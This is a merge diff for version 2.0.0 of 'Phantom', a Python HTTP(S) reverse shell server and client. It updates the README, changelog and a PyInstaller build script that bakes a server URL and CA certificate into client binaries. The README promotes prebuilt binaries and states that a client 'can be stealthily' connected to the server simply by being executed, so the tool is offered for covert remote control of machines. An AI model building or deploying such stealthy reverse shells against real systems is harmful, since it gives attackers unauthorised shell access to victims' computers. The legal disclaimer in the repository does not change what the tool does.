Merge pull request #5

Release v2.0.0

.gitignore

@@ -98,7 +98,6 @@ __pycache__/
 # Distribution / packaging
 build/
 develop-eggs/
-dist/
 downloads/
 eggs/
 .eggs/
@@ -225,4 +224,4 @@ dmypy.json
 cython_debug/
 
 # Project-specific files
-client.cfg
+config.py

CHANGELOG.md

@@ -4,5 +4,14 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [Unreleased]
+
+## [2.0.0] - 2021-11-26
+- Changed the project name to "Phantom" and URL to https://github.com/EONRaider/BCA-Phantom
+- Changed the CLI parsing to accept a full URL for the server instead of different parameters for hostname and port number
+- Greatly simplified the "client" and "build" modules by re-implementing them without using "configparser" for client configuration
+- Added HTTP mode for both servers and clients
+- Updated distribution binaries for Linux and Windows
+
 ## [1.0.0] - 2021-11-19
 - Public release

README.md

@@ -1,81 +1,93 @@
-# Python 3 HTTPS Reverse Shell
+# Phantom - A multi-platform HTTP(S) Reverse Shell Server and Client
 
 ![Python Version](https://img.shields.io/badge/python-3.9+-blue?style=for-the-badge&logo=python)
-[![CodeFactor Grade](https://img.shields.io/codefactor/grade/github/EONRaider/BCA-HTTPS-Reverse-Shell?label=CodeFactor&logo=codefactor&style=for-the-badge)](https://www.codefactor.io/repository/github/EONRaider/BCA-HTTPS-Reverse-Shell)
+[![CodeFactor Grade](https://img.shields.io/codefactor/grade/github/EONRaider/BCA-Phantom?label=CodeFactor&logo=codefactor&style=for-the-badge)](https://www.codefactor.io/repository/github/EONRaider/BCA-Phantom)
 ![OS](https://img.shields.io/badge/GNU%2FLinux-red?style=for-the-badge&logo=linux)
 ![OS](https://img.shields.io/badge/Windows-blue?style=for-the-badge&logo=windows)
 
 [![Reddit](https://img.shields.io/badge/Reddit-EONRaider-FF4500?style=flat-square&logo=reddit)](https://www.reddit.com/user/eonraider)
 [![Discord](https://img.shields.io/badge/Discord-EONRaider-7289DA?style=flat-square&logo=discord)](https://discord.gg/KVjWBptv)
 [![Twitter](https://img.shields.io/badge/Twitter-eon__raider-38A1F3?style=flat-square&logo=twitter)](https://twitter.com/intent/follow?screen_name=eon_raider)
 
-A **cross-platform HTTPS Reverse Shell** server and client in Python 3. Binaries for
-Linux and Windows platforms can be built through an embedded script that implements
+Phantom is a **multi-platform HTTP(S) Reverse Shell** server and client in Python 3. Binaries for
+Linux and Windows platforms can be built through an embedded script that executes 
 PyInstaller.
 
-This application also includes a helper shell script that enables fast generation of
+Reverse shells can be established through HTTP or HTTPS. The certificates used for 
+HTTPS can be auto-generated by Phantom or supplied by the user.
+
+Phantom includes a helper shell script that enables fast generation of
 self-signed certificates for use of both servers and clients. After generation, the
 server and certificate authority certificates required for encrypted connections 
 are bundled in the binaries for portability and ease of execution.
 
+## Demo
+![demo](https://github.com/EONRaider/static/blob/70ea04684f47e1314a95152a290d1e1d137784cd/phantom/usage.gif)
+
 ## Try it out!
-If you just need to see the tool in action on a local environment, simply head over 
-to the [demo-files](https://github.com/EONRaider/BCA-HTTPS-Reverse-Shell/tree/master/demo-files) 
-directory and download the pre-built Linux/Unix/macOS or Windows binaries.
+Simply head over to the [dist directory](https://github.com/EONRaider/BCA-Phantom/tree/master/dist) 
+and download the pre-built Linux/Unix or Windows binaries.
 
-The files are all bundled with certificates for `localhost` and work straight out-of-the-box. *Just
-set them with permissions to execute and run.*
+The HTTP client files are set to connect to http://localhost:8080, whereas the HTTPS client bundles a CA certificate file for https://localhost:4443 and will
+only connect to this socket. With that in mind, choose either HTTP or HTTPS and run the server on one shell:
+```shell
+./linux_server http://localhost:8080
+            <-- or -->
+./linux_server https://localhost:4443
+```
+And the client on another one...
+```shell
+./http_linux_client
+     <-- or -->
+./https_linux_client
+```
+The same procedure works for the Windows binaries.
+
+## Setup
+### HTTP Server and Client
+*You don't need to set up the server and client for HTTP connections.* The server will 
+work straight out-of-the-box and the client will connect to any HTTP server. Just [download 
+the HTTP binaries from dist](https://github.com/EONRaider/BCA-Phantom/tree/master/dist) 
+and you're done. Execute the binaries with the `--help` option for instructions.
 
-## Build
+### HTTPS Server and Client
 Encrypted communication through HTTPS requires at least two certificates: One for 
 the server, named `server.pem` by default, and another for the certificate authority, or `ca.pem`. 
-This HTTPS Reverse Shell bundles both files in binaries for fast deployment. They can be 
+Phantom bundles both files in binaries for fast deployment. They can be 
 generated by [multiple methods](https://www.digitalocean.com/community/tutorials/openssl-essentials-working-with-ssl-certificates-private-keys-and-csrs) 
-or by a simple execution of the [generate_certs.sh](https://github.com/EONRaider/BCA-HTTPS-Reverse-Shell/blob/master/src/generate_certs.sh) helper script.
+or by a simple execution of the [generate_certs.sh](https://github.com/EONRaider/BCA-Phantom/blob/master/src/generate_certs.sh) helper script.
 
-Once the certificates are ready you only need to (I) install the dependencies and (II) 
-run `build.py` to  build the `server` and `client` binaries.
+Once the certificates are ready you only need to follow the steps from the Build and Run
+section below.
 
+## Build and Run an HTTPS Server/Client
 ### I. Install Dependencies
 Dependency management works with both [Poetry](https://python-poetry.org/) (recommended)
-and [Virtualenv](https://virtualenv.pypa.io/en/latest/)
+and [Virtualenv](https://virtualenv.pypa.io/en/latest/). You need to install all 
+dependencies before building binaries.
 ```shell
-git clone https://github.com/EONRaider/BCA-HTTPS-Reverse-Shell.git
-cd BCA-HTTPS-Reverse-Shell
+git clone https://github.com/EONRaider/BCA-Phantom.git
+cd BCA-Phantom
 poetry install <--or--> pip install -r requirements.txt
 ```
 
-### II. Build Server and Client binaries
-The `build.py` file takes care of it all.
-```shell
-python build.py server --server-cert /path/to/server.pem
-python build.py client --ca-cert /path/to/ca.pem
-```
-
-## Usage
-![usage](https://github.com/EONRaider/static/blob/97b0e81aee6eb0f2b255a26cd138299e2361d025/https-reverse-shell/usage.gif)
-
-## Development mode (optional)
-You could optionally run the HTTPS Reverse Shell directly from a local Python 3 
-interpreter. [Install all dependencies](https://github.com/EONRaider/BCA-HTTPS-Reverse-Shell/tree/master#i-install-dependencies) 
-and run the `server.py` and `client.py` files. All required certificates will be 
-automatically generated for `localhost`.
-
-Execute the **Server** on one shell...
-```shell
-python src/server/server.py localhost 4443
-```
-
-... And the **Client** on another shell:
-```shell
-python src/client/client.py \
---host localhost \
---port 4443 \
---ca-cert src/server/ca.pem
-```
+### II. Build HTTPS Server and Client binaries
+The `build.py` file centralizes the process and takes care of it all. Notice that 
+a built Client binary contains a *hardcoded server URL*. **The connection to the server can 
+be stealthily performed by simply executing the binary.**
+- Build and run the **Server**
+    ```shell
+    python build.py server --server-cert /path/to/server.pem
+    ./linux_server SERVER_URL
+    ```
+- Build and run the **Client**
+  ```shell
+  python build.py client --url SERVER_URL --ca-cert /path/to/ca.pem
+  ./https_linux_client
+  ```
+The same procedure works for the Windows binaries.
 
 ## Legal Disclaimer
-
 The use of code contained in this repository, either in part or in its totality,
 for engaging targets without prior mutual consent is illegal. **It is
 the end user's responsibility to obey all applicable local, state and

build.py

@@ -1,25 +1,17 @@
 #!/usr/bin/env python3
-# https://github.com/EONRaider/BCA-HTTPS-Reverse-Shell
+# https://github.com/EONRaider/BCA-Phantom
 
 __author__ = "EONRaider @ keybase.io/eonraider"
 
 import argparse
-import configparser
 import functools
-import platform
 from pathlib import Path
+from platform import system
 from typing import Container
 
 import PyInstaller.__main__
 
 
-def os_sep() -> str:
-    """Gets the path separator for the current operating system.
-    Windows systems use ';' as a separator, whereas macOS/Linux/Unix
-    use ':'."""
-    return ";" if platform.system() == "Windows" else ":"
-
-
 def pyinstaller(func):
     """Decorator that takes a container of strings returned by a
     function and passes them as arguments to the PyInstaller runner."""
@@ -30,11 +22,23 @@ def build_binary(*args, **kwargs):
     return build_binary
 
 
+def os_name() -> str:
+    """Gets the name of the current operating system."""
+    return system().lower()
+
+
+def os_sep() -> str:
+    """Gets the path separator for the current operating system.
+    Windows systems use ';' as a separator, whereas macOS/Linux/Unix
+    use ':'."""
+    return ";" if os_name() == "windows" else ":"
+
+
 @pyinstaller
 def server(args: argparse.Namespace) -> list[str]:
     """Set-up the arguments required by PyInstaller to build the
     server binary."""
-    cmd = ["server/server.py", "--onefile"]
+    cmd = ["src/server/server.py", "--onefile", "--name", f"{os_name()}_server"]
     if args.server_cert is not None:
         cmd.extend(["--add-data", f"{args.server_cert}{os_sep()}."])
     return cmd
@@ -44,26 +48,24 @@ def server(args: argparse.Namespace) -> list[str]:
 def client(args: argparse.Namespace) -> list[str]:
     """Set-up the arguments required by PyInstaller to build the
     client binary."""
-
-    '''A configuration file named 'client.cfg' is created with 
-    hard-coded server address, port and CA information that allows 
+    config = {"url": args.url}
+    cmd = ["src/client/client.py", "--onefile", "--hidden-import", "config"]
+    os: str = os_name()
+
+    if args.ca_cert is None:
+        cmd.extend(["--name", f"http_{os}_client"])
+    else:  # Client bundles CA certificate file in PEM format
+        config.update({"ca_cert": Path(args.ca_cert).name})
+        cmd.extend(["--name", f"https_{os}_client",
+                    "--add-data", f"{args.ca_cert}{os_sep()}."])
+
+    '''A configuration file named 'client.py' is created with hardcoded 
+    server URL and path to CA certificate file, if any, that allows 
     seamless connection of the binary client to the server. This file 
     is bundled in the binary and read on execution.'''
-    config = configparser.ConfigParser()
-    config["CLIENT"] = {
-        "host": args.host,
-        "port": str(args.port),
-        "ca-certificate": Path(args.ca_cert).name
-    }
-
-    with open(file="client.cfg", mode="w") as config_file:
-        config.write(config_file)
-
-    sep = os_sep()
-    cmd = ["client/client.py",
-           "--onefile",
-           "--add-data", f"{args.ca_cert}{sep}.",
-           "--add-data", f"client.cfg{sep}."]
+    with open(file="src/client/config.py", mode="w") as config_file:
+        for key, value in config.items():
+            config_file.write(f"{key} = '{value}'\n")
 
     return cmd
 
@@ -85,16 +87,11 @@ def client(args: argparse.Namespace) -> list[str]:
 
     client_parser = subparsers.add_parser("client")
     client_parser.add_argument(
-        "host",
+        "url",
         type=str,
-        metavar="<hostname/address>",
-        help="Address or hostname of the server to connect to."
-    )
-    client_parser.add_argument(
-        "port",
-        type=int,
-        metavar="<port>",
-        help="Port number exposed by the server."
+        help="Full URL of the server (with optional port number) in the format "
+             "'SCHEME://DOMAIN|ADDRESS[:PORT]'. "
+             "Ex: http://192.168.0.10:8080 or https://your-domain.com"
     )
     client_parser.add_argument(
         "--ca-cert",